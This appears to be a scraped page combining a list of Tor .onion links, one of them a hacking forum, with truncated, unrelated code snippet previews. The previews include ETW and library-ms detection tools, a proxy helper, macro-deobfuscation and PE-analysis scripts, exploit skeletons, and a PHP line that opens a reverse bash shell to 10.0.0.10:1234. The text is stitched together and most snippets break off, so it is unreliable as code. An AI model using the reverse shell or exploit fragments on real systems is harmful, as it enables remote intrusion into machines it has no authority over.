- Torch Search Engine: http://xmh57jrzrnw6insl.onion/
- Chatting with Strangers: http://tetatl6umgbmtv27.onion/
- exodus: http://exoduockgfq3ikf7.onion/
- Hidden Answers: http://answerstedhctbek.onion
- Freehacks.ru: http://fhacksnplmzxaaoo.onion/
import time | |
import etw | |
import etw.evntrace | |
import sys | |
import argparse | |
import threading | |
class RundownDotNetETW(etw.ETW): | |
def __init__(self, verbose, high_risk_only): |
function Get-LibraryMS { | |
<# | |
.SYNOPSIS | |
Author: Jayden Zheng (@fuseyjz) | |
Checks the %USERPROFILE% directory for any file with library-ms extension and extract the CLSID. | |
In particular, <url> element with shell command. | |
Blog: pending release |
''' | |
Establish a socket connection through an HTTP proxy. | |
Author: Fredrik Østrem <[email protected]> | |
License: | |
This code can be used, modified and distributed freely, as long as it is this note containing the original | |
author, the source and this license, is put along with the source code. | |
''' |
<?php | |
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
import phun | |
class R(phun.Remote): | |
def menu(self): | |
self.read('4) free\n') | |
def cmd(self,nr,idx): | |
self.menu() | |
self.sendline(str(nr)) |
import re | |
import os,sys | |
import pefile | |
import struct | |
import zipfile | |
import hashlib | |
import StringIO | |
from Crypto import Random | |
from Crypto.PublicKey import RSA | |
from Crypto.Cipher import PKCS1_v1_5,AES |
#!/usr/bin/env python2 | |
import os | |
import re | |
import sys | |
import math | |
import pefile | |
import struct | |
import hashlib | |
import argparse | |
from oletools import olevba |
( olevba $document | grep ' = ' | \ | |
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \ | |
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \ | |
grep '\[\|\+'; \ | |
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]' | |
) \ | |
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]' |
#include <stdio.h> | |
#include <sys/mman.h> | |
#include <fcntl.h> | |
#include <pthread.h> | |
#include <unistd.h> | |
#include <sys/stat.h> | |
#include <string.h> | |
#include <sys/uio.h> | |
#include <sys/wait.h> |